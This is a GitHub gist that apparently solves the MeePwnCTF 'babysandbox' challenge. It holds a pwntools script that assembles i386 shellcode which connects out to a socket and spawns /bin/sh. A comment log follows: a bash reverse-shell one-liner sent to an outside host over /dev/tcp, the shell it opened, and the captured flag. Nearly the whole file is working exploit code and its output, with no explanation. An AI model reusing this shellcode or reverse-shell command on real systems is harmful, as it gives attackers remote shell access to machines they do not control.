Created
July 16, 2018 13:04
-
-
Save dialluvioso/20eccb87df96720a05a38425be124b9f to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| from base64 import b64encode | |
| context.arch = 'i386' | |
| shellcode = asm(''' | |
| push 0x66 | |
| pop eax | |
| push ebx | |
| inc ebx | |
| push ebx | |
| push 0x2 | |
| mov ecx, esp | |
| call _sysenter | |
| xor ecx, ecx | |
| xchg ebx, eax | |
| mov al, 0x66 | |
| push 0x0100007f | |
| push 0x99990002 | |
| mov ecx, esp | |
| push 0x10 | |
| push ecx | |
| push ebx | |
| mov bl, 0x3 | |
| mov ecx, esp | |
| call _sysenter | |
| mov al, 0x3f | |
| xor ecx, ecx | |
| call _sysenter | |
| mov al, 0x3f | |
| inc ecx | |
| call _sysenter | |
| mov al, 0x3f | |
| inc ecx | |
| call _sysenter | |
| push edx | |
| push 0x68732f | |
| push 0x6e69622f | |
| mov ebx, esp | |
| xor edx, edx | |
| push edx | |
| push ebx | |
| mov ecx, esp | |
| mov al, 0x0b | |
| call _sysenter | |
| mov al, 0x1 | |
| or ebx, -1 | |
| _sysenter: | |
| push ecx | |
| push edx | |
| push ebp | |
| mov ebp, esp | |
| sysenter | |
| ''') | |
| print b64encode(shellcode) | |
| ''' | |
| $ echo "bash -c 'bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1337 0>&1'" | ./ncat.exe -lvnp 39321 | |
| $ ./ncat -lvnp 1337 | |
| bash: cannot set terminal process group (12270): Inappropriate ioctl for device | |
| bash: no job control in this shell | |
| babysandbox@20283cd3903b:/$ id | |
| id | |
| uid=1000(babysandbox) gid=1000(babysandbox) groups=1000(babysandbox) | |
| babysandbox@20283cd3903b:/$ cat /flag | |
| cat /flag | |
| MeePwnCTF{Unicorn_Engine_Is_So_Good_But_Not_Perfect} | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment